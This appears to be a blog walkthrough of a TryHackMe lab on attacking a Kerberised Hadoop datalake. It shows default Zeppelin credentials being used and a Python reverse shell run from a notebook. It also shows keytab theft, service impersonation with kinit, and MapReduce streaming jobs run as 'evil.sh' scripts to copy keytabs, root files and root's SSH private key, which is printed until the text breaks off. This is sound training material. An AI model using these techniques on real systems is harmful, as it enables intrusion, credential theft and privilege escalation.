Hacking Hadoop

An explanation of enumerating and exploiting a Hadoop environment

In this blog we will see how the Hadoop architecture can be exploited, using the TryHackMe room Hacking Hadoop as an example.

Connecting to the Datalake

This lab simulates a network using Docker. To access this network, you will first have to configure your routing so that you can reach it.

The lab lives in the 172.23.0.0/24 range, so you will have to configure a route to the Hadoop network. First connect to THM using your normal VPN file, then download the OpenVPN file from the first task section; it gives access to the internal Hadoop network. Then start the network and wait about 10 minutes after the lab has started for the cluster to become fully active.
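If the route to 172.23.0.0/24 is not pushed automatically by the OpenVPN profile, you can add it by hand. This is a minimal sketch assuming the Hadoop VPN comes up as tun1 on your machine (check the real interface name with ip addr), followed by a quick connectivity check once the cluster has booted:

sudo ip route add 172.23.0.0/24 dev tun1
ip route | grep 172.23    # confirm the route is in place
ping -c 3 172.23.0.3      # the edge node should reply once the cluster is up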

The network infrastructure is as follows -

  • 172.23.0.3 - This is your primary target, an edge node in the Hadoop network.

  • 172.23.0.4 - In Hadoop terms, this is called the "master" node. Your final flag is here and root access signifies full Hadoop compromise.

  • 172.23.0.2 - This is the simulated Kerberos server. This server is out of scope for this challenge.

After that we need to add the target IP address to the hosts file:

echo '10.10.215.96 thm_hadoop_network.net' >> /etc/hosts

Once this is done and you have given the lab some time to boot, try pinging 172.23.0.3 to see whether the networking is working and responding. In this blog we will learn to compromise a datalake. Most large organisations out there have at least one datalake, some even more, and the most widely used datalake technology out there is Hadoop.

Hadoop Terminology

There are some key terms used in Hadoop that you should know to make this hacking journey easier. It should be noted that Hadoop still makes use of the terms master and slave, since primary and secondary already have specific meanings in the context of Hadoop.

  • Cluster - Refers to all the systems that together make the datalake.

  • Node - A single host or computer in the Hadoop cluster.

  • NameNode - A node that is responsible for keeping the directory tree of the Hadoop file system.

  • DataNode - A slave node that stores files according to the instructions of a NameNode.

  • Primary NameNode - The current active node responsible for keeping the directory structure.

  • Secondary NameNode - The backup node which will perform a seamless takeover of the directory structure should the Primary NameNode become unresponsive. There can be more than one Secondary NameNode in a cluster, but only one Primary active at any given time.

  • Master Node - Any node that is executing a Hadoop "management" application such as HDFS Manager or YARN Resource Manager.

  • Slave Node - Any node that runs a Hadoop "worker" application such as HDFS or MapReduce. It should be noted that a single node can be both a Master and Slave node at the same time.

  • Edge Node - Any node that is hosting a Hadoop "user" application such as Zeppelin or Hue. These are applications that users can use to perform processing on the data stored in the datalake.

  • Kerberised - The term given for a datalake that has security enabled through Kerberos.

What is Hadoop?

Hadoop is a datalake technology developed by Apache. It is a collection of open-source applications and services that can utilise a network of computers to solve large and complex problems. Hadoop in its simplest form has two main functions, namely distributed storage and distributed processing. In essence, it allows a network of computers to become one very large computer with a massive hard drive and a ton of CPU power. How big are we talking? Well, let's just put it this way: most organisations have clusters of about 200 nodes, each with about 25 terabytes of storage, equalling a staggering 5 petabytes of storage and roughly 1700 CPUs. To ensure network speed is not a bottleneck, these nodes are usually connected to each other through multiple fibre lines. The world's largest cluster? 2000+ nodes with 21 PB of storage capacity and 22000+ CPUs. Below is an example architecture of a Hadoop ecosystem.

There are quite a number of different Apache Hadoop applications and services. These are some of the most common ones:

  • HDFS - Hadoop Distributed File System is the primary storage application for unstructured data such as files

  • Hive - Hive is the primary storage application for structured data. Think of it as a massive database.

  • YARN - Main resource manager application of Hadoop, used to schedule jobs in the cluster

  • MapReduce - Application executor of Hadoop to process vast amounts of data. It consists of a Map procedure, which performs filtering and sorting, and a reduce method, which performs a summary operation.

  • HUE - A user application that provides a GUI for HDFS and Hive.

  • Zookeeper - Provides operational services for the cluster to set the configuration of the cluster in question.

  • Spark - Engine for large-scale data processing.

  • Kafka - A message broker to build pipelines for real-time data processing.

  • Ranger - Used for the configuration of privilege access control over the resources in the datalake.

  • Zeppelin - A web-based notebook application for interactive data analytics.

All these applications are open source; you can download the source code and spin them up on your own local machine. In this blog we are focusing on the primary applications such as HDFS and YARN. For many years security wasn't really a thing in Hadoop, but over the years improvements have been made. The two biggest security implementations are authentication through Kerberos and privilege access control through optional applications such as Ranger. In this blog we will be looking at a Kerberised datalake, so there is some security, but common misconfigurations have left it insecure.

The answers to the questions in this section of the room can easily be found with a Google search.

All aboard the Hindenburg

Begin recon on the IP 172.23.0.3:

root@kali ~/t/hadoop# nmap -sC -sV -O 172.23.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-12 00:47 EST
Nmap scan report for 172.23.0.3
Host is up (0.34s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
8031/tcp open  hadoop-ipc Hadoop IPC
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Content-type: text/plain
|_    looks like you are making an HTTP request to a Hadoop IPC port. This is not the correct port for the web interface on this daemon.
8042/tcp open  http       Jetty 6.1.26
| http-title:       
|_Requested resource was http://172.23.0.3:8042/node
|_http-server-header: Jetty(6.1.26)
8080/tcp open  http       Jetty 9.4.14.v20181114
|_http-title: Zeppelin
|_http-server-header: Jetty(9.4.14.v20181114)
8088/tcp open  http       Jetty 6.1.26
| http-title:     All Applications  
|_Requested resource was http://172.23.0.3:8088/cluster
|_http-server-header: Jetty(6.1.26)
9000/tcp open  hadoop-ipc Hadoop IPC
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Content-type: text/plain
Nmap done: 1 IP address (1 host up) scanned in 48.47 seconds

There are several ports open and services running. Visiting the web application on port 8080:

The webpage is running Zeppelin, which is used as a web notebook for data analytics. Now let's answer the questions in this section; the following link helps with the answers:

https://zeppelin.apache.org/docs/0.6.2/security/shiroauthentication.html
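For reference, Zeppelin's authentication is configured in conf/shiro.ini, and the documented example of its [users] section maps plaintext usernames to passwords and roles, roughly like this:

[users]
admin = password1
user1 = password2, role1, role2
user2 = password3, role3

Instances left with these documented defaults are trivially accessible, which is exactly what happens here.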

1. What edge node service is running on this host?

  • Zeppelin

2. What file is responsible for the authentication configuration for this service?

  • shiro.ini

3. What is the username and password combination that gives you your initial entry?

  • user1:password2

4. Once authenticated, submit the flag that is hiding nicely in one of the notebooks. To get the flag, authenticate with the credentials we found.

Login

After that click on TestNode.

Got the first flag

Rocking it like Led

This is a very popular Hadoop application. Similar to Jupyter notebooks, it allows data analysts to quickly write up scripts that pull, process, and display analytics from the data stored in the cluster. It does this by making use of interpreters, of which there are many to choose from. However, not all interpreters are equal. Similarly, not all user roles are equal. The task in this section is to compromise the target and get the flag inside the user's home directory.

Answering the questions

  1. What is the password of the user allowed to interface with the interpreters and provided notebook?

From the previous TestNode notebook, scroll down to see the password for user2.

2. Which active interpreter can be used to execute code?

  • Python

3. What OS user does the application run as?

To find out, we need to get a shell using the interpreter. First, log in as user2 with the credentials we got.

We already know that the Python interpreter is active. Use the Python reverse shell code below, editing in your machine's IP and listening port.

import socket,os,pty;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.8.0.2",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")

Start a listener on port 1234
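For example, using netcat on the attacking machine (1234 matches the port hard-coded in the payload above; adjust both if you change it):

nc -lvnp 1234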

Press Shift+Enter in the notebook to execute the code, then check the listener.

We got a reverse shell as user zp.

You can stabilise the reverse shell for better interactivity; a tutorial is available here

[zp@hadoop zeppelin]$ export SHELL=bash
[zp@hadoop zeppelin]$ export TERM=xterm-256color
[zp@hadoop zeppelin]$ stty rows 43 cols 158
[zp@hadoop zeppelin]$ whoami 
zp

4. What is the value of the flag found in the user's home directory (flag2.txt)?

The flag can be found in the home directory of the user zp:

[zp@hadoop ~]$ cat flag2.txt 
THM{It.Was.Hydrogen!}
[zp@hadoop ~]$ pwd
/home/zp

Keeping tabs on all these keys

With a stable reverse shell we have access to the edge node, but we do not yet have access to the datalake itself because of Kerberos authentication. In Hadoop there are many services running, and each of them has to authenticate to Kerberos before it can perform any action. How do they do that without a human typing passwords? The simple answer is automation through Kerberos keytabs.

Keytabs are magical things. Think of them as a Kerberos key: essentially, you store all the information required to authenticate (including the password) in a file. Keytabs can be generated by interfacing with the Kerberos server and executing the following command:

ktpass /pass <Krb Password> /mapuser <Krb Username>  /out <ex.keytab> /princ  <username>/<hostname>@<example.com> /ptype  KRB5_NT_PRINCIPAL /crypto RC4-HMAC-NT /Target example
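The ktpass syntax above is the Windows/Active Directory tool. On an MIT Kerberos KDC, like the one simulated in this lab, an administrator would typically export a keytab with kadmin on the Kerberos server itself; a rough sketch (the principal and output path simply mirror this lab's naming):

kadmin.local -q "ktadd -k /etc/security/keytabs/zp.service.keytab zp/hadoop.docker.com@EXAMPLE.COM"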

The security of keytabs relies on restricting access to the associated keytab file. So file permissions should be used to protect the keytab file in question, similar to how SSH private keys are protected. However, by default, these keytab files do not inherit secure file permissions, especially during the initialisation phase when the datalake is created and these keys have to be distributed to each node in the cluster.
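As a rough illustration, a properly locked-down keytab looks much like an SSH private key: owned by the service account and readable by nobody else (the service name and path here just follow the lab's layout):

chown yarn /etc/security/keytabs/yarn.service.keytab
chmod 600 /etc/security/keytabs/yarn.service.keytab
ls -l /etc/security/keytabs/    # nothing should be group- or world-readable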

  1. Which directory stores the keytabs for the Hadoop services?

[zp@hadoop ~]$ find / -name *.keytab 2>/dev/null
/etc/security/keytabs/yarn.service.keytab
/etc/security/keytabs/nm.service.keytab
/etc/security/keytabs/jhs.service.keytab
/etc/security/keytabs/rm.service.keytab
/etc/security/keytabs/spnego.service.keytab
/etc/security/keytabs/dn.service.keytab
/etc/security/keytabs/root.service.keytab
/etc/security/keytabs/nn.service.keytab
/etc/security/keytabs/zp.service.keytab

Answer - /etc/security/keytabs

2. What is the keytab file's name associated with the compromised user?

Answer - zp.service.keytab

After finding the keytabs, try to authenticate to Kerberos with the keytab associated with our user. The following guide provides excellent assistance on using keytabs for authentication:

https://kb.iu.edu/d/aumh

3. What is the first principal stored in this keytab file?

The klist command can be used to gather information from a keytab, since cat'ing the keytab usually ends badly for your shell. We can use the following command to output the principals stored in the keytab file

[zp@hadoop ~]$ klist -k /etc/security/keytabs/zp.service.keytab
Keytab name: FILE:/etc/security/keytabs/zp.service.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 zp/hadoop.docker.com@EXAMPLE.COM
   2 zp/hadoop.docker.com@EXAMPLE.COM
   2 zp/hadoop.docker.com@EXAMPLE.COM
   2 zp/hadoop.docker.com@EXAMPLE.COM
   2 zp/hadoop.docker.com@EXAMPLE.COM
   2 zp/hadoop.docker.com@EXAMPLE.COM

Answer - zp/hadoop.docker.com@EXAMPLE.COM

4. What is the full verbose command to authenticate with this keytab using the full file path?

The kinit command can be used to take a keytab, authenticate to the Kerberos server, and request a ticket:

[zp@hadoop bin]$ kinit zp/hadoop.docker.com@EXAMPLE.COM -k -V -t /etc/security/keytabs/zp.service.keytab
Using default cache: /tmp/krb5cc_507
Using principal: zp/hadoop.docker.com@EXAMPLE.COM
Using keytab: /etc/security/keytabs/zp.service.keytab
Authenticated to Kerberos v5

The -V flag is optional, but adding it is recommended for additional verbosity, which helps with debugging.

Answer - kinit zp/hadoop.docker.com@EXAMPLE.COM -k -V -t /etc/security/keytabs/zp.service.keytab
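Once kinit succeeds, you can sanity-check the result by listing the default credential cache; it should now hold a krbtgt/EXAMPLE.COM@EXAMPLE.COM ticket for the zp principal:

klist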

5. What is the value of the flag stored in the compromised user's HDFS home directory (flag3.txt)?

Now that authentication is complete, we can start to interface with the datalake. However, we don't have immediate access to the Hadoop CLI tools, because the compromised user does not have the correct environment set up. All the tools for the Hadoop services are located in /usr/local/hadoop/bin, so navigate there first. We need to interact with the HDFS application; refer to the guide:

https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/HDFSCommands.html
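As an alternative to prefixing every command with ./ from that directory, you could add it to the PATH of the current shell session (a small convenience, assuming a bash shell):

export PATH=$PATH:/usr/local/hadoop/bin
hdfs dfs -ls /    # now resolves without the ./ prefix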

[zp@hadoop bin]$ pwd
/usr/local/hadoop/bin
[zp@hadoop bin]$ ls
container-executor  hadoop  hadoop.cmd  hdfs  hdfs.cmd  mapred  mapred.cmd  rcc  test-container-executor  yarn  yarn.cmd

The command that we are specifically interested in is the dfs command, which allows us to run file system commands on the datalake.

[zp@hadoop bin]$ ./hdfs dfs -ls /
22/03/12 07:21:35 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 2 items
drwxrwxrwx   - root root          0 2021-10-15 10:52 /tmp
drwxr-xr-x   - root root          0 2022-03-12 05:18 /user

We can list the directories inside the datalake; there are two to be found. Navigating into the /user directory and getting the flag:

[zp@hadoop bin]$ ./hdfs dfs -ls /user
22/03/12 07:21:57 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 9 items
drwxr-xr-x   - dn     hadoop_services          0 2021-10-15 10:53 /user/dn
drwxr-xr-x   - jhs    hadoop_services          0 2021-10-15 10:53 /user/jhs
drwxr-xr-x   - nm     hadoop_super             0 2022-03-12 05:18 /user/nm
drwxr-xr-x   - nn     hadoop_services          0 2021-10-15 10:53 /user/nn
drwxr-xr-x   - rm     hadoop_services          0 2021-10-15 10:53 /user/rm
drwxr-xr-x   - root   root                     0 2022-03-12 05:18 /user/root
drwxr-xr-x   - spnego hadoop_services          0 2021-10-15 10:53 /user/spnego
drwxr-xr-x   - yarn   hadoop_services          0 2022-03-12 05:18 /user/yarn
drwxr-xr-x   - zp     hadoop_services          0 2022-03-12 05:17 /user/zp
[zp@hadoop bin]$ ./hdfs dfs -ls /user/zp
22/03/12 07:22:21 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 1 items
-rw-------   1 zp hadoop_services         50 2022-03-12 05:17 /user/zp/flag3.txt
[zp@hadoop bin]$ ./hdfs dfs -cat /user/zp/flag3.txt
22/03/12 07:22:46 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
THM{Now.We.Are.Talking.About.Distributed.Storage}

A great ball of YARN

We have access to the datalake, but we have not yet performed privilege escalation. After authenticating to the datalake, things start to get interesting. Even though the datalake may look like a normal Unix file system, authentication and access control work a little differently in Hadoop. One key concept to understand is that your current OS user and your cluster user DO NOT have to correspond. Through Kerberos, the cluster will believe you are whoever you authenticate as, regardless of your actual OS user.
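You can see this split identity directly from the shell: the OS still sees the low-privileged zp user, while the cluster only cares about the Kerberos principal in your ticket cache:

whoami    # still zp at the OS level
klist     # the "Default principal" line is who the cluster thinks you are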

Often, the services in Hadoop have to perform impersonation to carry out their duties. The HUE user may have to impersonate the HDFS user to create a new home directory. The Zeppelin user may have to impersonate the YARN user to schedule a job. YARN may impersonate the NodeManager to allocate processes to different nodes.

The secure way of configuring this is to copy keytabs and restrict them with granular file permissions to only the services that require them. But lazy admins sometimes skip this crucial step because of the complexity and workload involved.

So what organisations usually do is they just chmod the hell (666) out of these keys until the services can impersonate as they deem fit. In our case, our organisation at least tried to perform some key segregation by using group permissions, but it is honestly not that much more secure.
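Before picking a target, it is worth checking what that group-based segregation actually lets the compromised user read, for example:

id                              # which groups does zp belong to?
ls -l /etc/security/keytabs/    # which keytabs are readable through those groups?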

  1. What is the name of the service we will attempt to impersonate for privilege escalation?

Answer - YARN

2. What is the value of the flag in the impersonated user's HDFS home directory (flag4.txt)?

Using the same technique as in the previous section, we can get the flag from the HDFS home directory.

[zp@hadoop bin]$ klist -k /etc/security/keytabs/yarn.service.keytab 
Keytab name: FILE:/etc/security/keytabs/yarn.service.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 yarn/hadoop.docker.com@EXAMPLE.COM
   2 yarn/hadoop.docker.com@EXAMPLE.COM
   2 yarn/hadoop.docker.com@EXAMPLE.COM
   2 yarn/hadoop.docker.com@EXAMPLE.COM
   2 yarn/hadoop.docker.com@EXAMPLE.COM
   2 yarn/hadoop.docker.com@EXAMPLE.COM

Now we can use the principal above to authenticate to the Kerberos server.

[zp@hadoop bin]$ kinit yarn/hadoop.docker.com@EXAMPLE.COM -k -V -t /etc/security/keytabs/yarn.service.keytab 
Using default cache: /tmp/krb5cc_507
Using principal: yarn/hadoop.docker.com@EXAMPLE.COM
Using keytab: /etc/security/keytabs/yarn.service.keytab
Authenticated to Kerberos v5

Using the hdfs binary to list the impersonated user's HDFS home directory:

[zp@hadoop bin]$ ./hdfs dfs -ls /user/yarn
22/03/12 09:28:43 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 1 items
-rw-------   1 yarn hadoop_services         28 2022-03-12 05:18 /user/yarn/flag4.txt
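The listing confirms flag4.txt is there; it can be read with the same -cat subcommand used for flag3 (output omitted here):

./hdfs dfs -cat /user/yarn/flag4.txt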

3. What is the value of the flag in the impersonated user's OS home directory (flag5.txt)?

HDFS impersonation is cool and all because we can now access the home directories of other users, but from an OS perspective we are still the low-privileged user. We need to find some way to abuse the permissions of this impersonated service to also become this user at the OS level. Enter MapReduce. Certain Hadoop services, our impersonated service being one of them, have the ability to ask the datalake to execute processes on their behalf. The interesting thing is that these jobs are executed in the context of the user associated with the job. We can abuse this to perform RCE. Refer to the GitHub page below for how to perform RCE:

https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Executing%20remote%20commands
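In short, the technique from that repository is to submit a Hadoop streaming job whose mapper is an arbitrary shell command; the job then runs that command in the context of the user who submitted it. The generic shape of the command, before we fill in our specifics below, is roughly:

hadoop jar <path-to>/hadoop-streaming-<version>.jar \
    -input  <any existing HDFS file> \
    -output <a new, non-existing HDFS directory> \
    -mapper "<command to run>" \
    -reducer NONE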

First, create an empty input file on HDFS for the job to consume:

[zp@hadoop bin]$ ./hdfs dfs -touchz /tmp/text.txt
22/03/12 09:35:25 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

Now execute the command below to read the flag in the yarn user's OS home directory and write the output to /tmp/flag on HDFS. For a clear explanation of the command, refer to the post above to understand the logic behind it.

[zp@hadoop bin]$ ./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/text.txt -output /tmp/flag -mapper "cat /home/yarn/flag5.txt" -reducer NONE
22/03/12 09:41:35 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/tmp/hadoop-unjar6549812581536747546/] [] /tmp/streamjob5689524998558489075.jar tmpDir=null
22/03/12 09:41:36 INFO client.RMProxy: Connecting to ResourceManager at /0.0.0.0:8032
22/03/12 09:41:36 INFO client.RMProxy: Connecting to ResourceManager at /0.0.0.0:8032
...
...
	Map-Reduce Framework
		Map input records=0
		Map output records=1
		Input split bytes=94
		Spilled Records=0
		Failed Shuffles=0
		Merged Map outputs=0
		GC time elapsed (ms)=73
		CPU time spent (ms)=900
		Physical memory (bytes) snapshot=167104512
		Virtual memory (bytes) snapshot=1939415040
		Total committed heap usage (bytes)=91750400
	File Input Format Counters 
		Bytes Read=0
	File Output Format Counters 
		Bytes Written=40
22/03/12 09:41:53 INFO streaming.StreamJob: Output directory: /tmp/flag

The output containing the flag is written to a part file under the /tmp/flag output directory on HDFS. List the directory and read the flag:

[zp@hadoop bin]$ ./hdfs dfs -ls /tmp/flag
22/03/12 09:42:05 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 2 items
-rw-r--r--   1 yarn root          0 2022-03-12 09:41 /tmp/flag/_SUCCESS
-rw-r--r--   1 yarn root         40 2022-03-12 09:41 /tmp/flag/part-00000
[zp@hadoop bin]$ ./hdfs dfs -cat /tmp/flag/part-00000
22/03/12 09:42:25 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
THM{Little.Kitty.Got.Its.Ball.Of.Yarn}

Assistant to the regional Node

After all this impersonation there is one peculiar keytab remaining: the one belonging to the NodeManager service. This service was not mentioned at the start, since it is one you normally never interact with directly.

Essentially, behind the scenes, this service ensures that all nodes are up and running. If a node becomes unhealthy, the NodeManager will inform the relevant services like ResourceManager to distribute the load of that node onto others in order to improve the node's health or get it ready for retirement.

It stays behind the scenes because organisations usually make use of what are called datalake management solutions. These are applications like Ambari or Cloudera Manager, which provide a centralised platform that helps control, manage, and deploy your cluster. However, they are usually just wrappers around the NodeManager and ResourceManager services.

With all of this being said, if you ever want to control the entire cluster, this is the service to hunt for. We will impersonate the NodeManager service from both a datalake and an OS perspective.

  1. What is the value of the flag associated with the NodeManager's HDFS home directory (flag6.txt)?

We will follow the same methodology as before to impersonate the NodeManager, but as a low-privileged user we do not have permission to read the NodeManager keytab directly. First, create a bash script that copies the NodeManager keytab to the /tmp directory and makes it world-readable, then make the script executable:

echo -e '#!/bin/bash' > /tmp/evil.sh
echo -e 'cp /etc/security/keytabs/nm.service.keytab /tmp/nm.service.keytab' >> /tmp/evil.sh
echo -e 'chmod 777 /tmp/nm.service.keytab' >> /tmp/evil.sh
chmod +x /tmp/evil.sh

After this we will use the same command as before to run the evil.sh script that will do the work.

[zp@hadoop bin]$ ./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/text.txt -output /tmp/node -mapper "/tmp/evil.sh" -file /tmp/evil.sh -reducer NONE
22/03/12 09:58:51 WARN streaming.StreamJob: -file option is deprecated, please use generic option -files instead.
22/03/12 09:58:51 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/tmp/evil.sh, /tmp/hadoop-unjar4615029854440937598/] [] /tmp/streamjob1657540646974650546.jar tmpDir=null
22/03/12 09:58:52 INFO client.RMProxy: Connecting to ResourceManager at /0.0.0.0:8032
22/03/12 09:58:52 INFO client.RMProxy: Connecting to ResourceManager at /0.0.0.0:8032
22/03/12 09:58:52 INFO hdfs.DFSClient: Created HDFS_DELEGATION_TOKEN token 5 for yarn on 172.23.0.3:9000
22/03/12 09:58:52 INFO security.TokenCache: Got dt for hdfs://hadoop.docker.com:9000; Kind: HDFS_DELEGATION_TOKEN, Service: 172.23.0.3:9000, Ident: (HDFS_DELEGATION_TOKEN token 5 for yarn)
22/03/12 09:58:53 INFO mapred.FileInputFormat: Total input paths to process : 1
22/03/12 09:58:53 INFO mapreduce.JobSubmitter: number of splits:1
22/03/12 09:58:53 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1647062258512_0005
successfully
22/03/12 09:59:09 INFO mapreduce.Job: Counters: 30
	File System Counters
		FILE: Number of bytes read=0
		FILE: Number of bytes written=130197
...
...
		Total committed heap usage (bytes)=93323264
	File Input Format Counters 
		Bytes Read=0
	File Output Format Counters 
		Bytes Written=0
22/03/12 09:59:09 INFO streaming.StreamJob: Output directory: /tmp/node

Now that we have access to the NodeManager keytab, we can use it to authenticate and then impersonate the service to read the flag.

[zp@hadoop bin]$ klist -k /tmp/nm.service.keytab
Keytab name: FILE:/tmp/nm.service.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 nm/hadoop.docker.com@EXAMPLE.COM
   2 nm/hadoop.docker.com@EXAMPLE.COM
   2 nm/hadoop.docker.com@EXAMPLE.COM
   2 nm/hadoop.docker.com@EXAMPLE.COM
   2 nm/hadoop.docker.com@EXAMPLE.COM
   2 nm/hadoop.docker.com@EXAMPLE.COM
[zp@hadoop bin]$ 
[zp@hadoop bin]$ kinit nm/hadoop.docker.com@EXAMPLE.COM -k -V -t /tmp/nm.service.keytab
Using default cache: /tmp/krb5cc_507
Using principal: nm/hadoop.docker.com@EXAMPLE.COM
Using keytab: /tmp/nm.service.keytab
Authenticated to Kerberos v5
[zp@hadoop bin]$ 
[zp@hadoop bin]$ ./hdfs dfs -cat /user/nm/flag6.txt
22/03/12 10:00:08 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
THM{Regional.Assistant.Manager}
[zp@hadoop bin]$

2. What is the value of the flag associated with the NodeManager's OS home directory (flag7.txt)?

Using the same methodology, we can read the flag in the NodeManager's OS home directory. Create a bash script that reads the flag, and give the script executable permissions too:

echo -e '#!/bin/bash' > /tmp/flag7.sh
echo -e 'cat /home/nm/flag7.txt' >> /tmp/flag7.sh
chmod +x /tmp/flag7.sh

Now execute the same command to impersonate, read the flag and redirect the output.

[zp@hadoop bin]$ ./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/text.txt -output /tmp/node2 -mapper "/tmp/flag7.sh" -file /tmp/flag7.sh -reducer NONE
22/03/12 10:06:08 WARN streaming.StreamJob: -file option is deprecated, please use generic option -files instead.
22/03/12 10:06:08 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/tmp/flag7.sh, /tmp/hadoop-unjar4238222037514121569/] [] /tmp/streamjob464330926517905157.jar tmpDir=null
22/03/12 10:06:10 INFO client.RMProxy: Connecting to ResourceManager at /0.0.0.0:8032
22/03/12 10:06:10 INFO client.RMProxy: Connecting to ResourceManager at /0.0.0.0:8032
22/03/12 10:06:10 INFO hdfs.DFSClient: Created HDFS_DELEGATION_TOKEN token 6 for nm on 172.23.0.3:9000
...
...
	File Input Format Counters 
		Bytes Read=0
	File Output Format Counters 
		Bytes Written=41
22/03/12 10:06:27 INFO streaming.StreamJob: Output directory: /tmp/node2

After this read the flag.

[zp@hadoop bin]$ ./hdfs dfs -cat /tmp/node2/part-00000
22/03/12 10:07:28 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
THM{Assistance.To.The.Regional.Manager}

I❤️root

After impersonating every other user and service, it's time to target the root user. The methodology is the same as above.

  1. What is the value of the flag in the root user's home directory (flag8.txt)?

Like before, create a bash script that copies the flag from the root user's home directory to /tmp and makes it readable by all users; make the script executable as with the earlier ones:

echo -e '#!/bin/bash' > /tmp/root.sh
echo -e 'sudo cp /root/flag8.txt /tmp/root.txt' >> /tmp/root.sh
echo -e 'sudo chmod 777 /tmp/root.txt' >> /tmp/root.sh
chmod +x /tmp/root.sh

After this, run the same kind of streaming job as above.

./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/text.txt -output /tmp/root -mapper "/tmp/root.sh" -file /tmp/root.sh -reducer NONE

Then reading the flag.

[zp@hadoop bin]$ cat /tmp/root.txt 
THM{This.Has.Got.To.Be.The.Saddest.Root.Privesc.Ever}

2. What is the value of the flag in the root user's HDFS home directory (flag9.txt)?

To get the flag inside root's HDFS home directory, we need to impersonate the root user. Create a bash script that copies the root service keytab to the /tmp directory and makes it readable, then give the script executable permissions:

echo -e '#!/bin/bash' > /tmp/evil3.sh
echo -e 'sudo cp /etc/security/keytabs/root.service.keytab /tmp/root.service.keytab' >> /tmp/evil3.sh
echo -e 'sudo chmod 777 /tmp/root.service.keytab' >> /tmp/evil3.sh
chmod +x /tmp/evil3.sh

Now execute the command to run the script.

./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/text.txt -output /tmp/root2 -mapper "/tmp/evil3.sh" -file /tmp/evil3.sh -reducer NONE

After this use the root keytab to authenticate to Kerberos.

[zp@hadoop bin]$ klist -k /tmp/root.service.keytab
Keytab name: FILE:/tmp/root.service.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 root@EXAMPLE.COM
   2 root@EXAMPLE.COM
   2 root@EXAMPLE.COM
   2 root@EXAMPLE.COM
   2 root@EXAMPLE.COM
   2 root@EXAMPLE.COM 
[zp@hadoop bin]$ kinit root@EXAMPLE.COM -k -V -t /tmp/root.service.keytab
Using default cache: /tmp/krb5cc_507
Using principal: root@EXAMPLE.COM
Using keytab: /tmp/root.service.keytab
Authenticated to Kerberos v5

Now you can read the flag.

[zp@hadoop bin]$ ./hdfs dfs -cat flag9.txt
22/03/12 10:19:18 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
THM{Nothing.Can.Stop.You.Now!}

Surfing the datalake

After all this impersonation, we can actually gain root SSH access using the very same method.

  1. What is the value of the flag in the root user's directory on the secondary cluster node (flag10.txt)?

Create a bash script that copies the root user's SSH private key (id_rsa) to the /tmp directory, and give the script executable permissions as well:

echo -e '#!/bin/bash' > /tmp/evil2.sh
echo -e 'sudo cp /root/.ssh/id_rsa /tmp/id_rsa_stolen' >> /tmp/evil2.sh
echo -e 'sudo chmod 777 /tmp/id_rsa_stolen' >> /tmp/evil2.sh
chmod +x /tmp/evil2.sh

First authenticate with the NodeManager keytab we extracted earlier (the same one used for the root privilege escalation):

kinit nm/hadoop.docker.com@EXAMPLE.COM -k -V -t /tmp/nm.service.keytab

Now use the command from before to execute the script.

./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/text.txt -output /tmp/root3 -mapper "/tmp/evil2.sh" -file /tmp/evil2.sh -reducer NONE

Confirm the id_rsa we got.

[zp@hadoop bin]$ cat /tmp/id_rsa_stolen 
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEA0PctY54xz7K48R8mK7MdkRovognpe8sUVvSWepgN2xZv+zwn
Cbynzmi+cVEhOZ1ymAOzOO+FWM03rSucNiuQPorF7rgtjh5RrL/RmWdO4Ah4k6ol
mxOXYMEtAewQBc5/4BCOLFupqNd1XnIx8CadYyachef3qkdXcXqMbCoS+xD4IrhD
V9+oMgBguTWaHoFzOBTD4D764nhrR7pbuEddqZZY50iq3iRMYFRDOSEqCw7TIyoa
khyw4MLpCpI7IJvK6g5SyF2jlF31etBTZy+uKk+n6wME3ApKUsL6dtupBKRcj37O
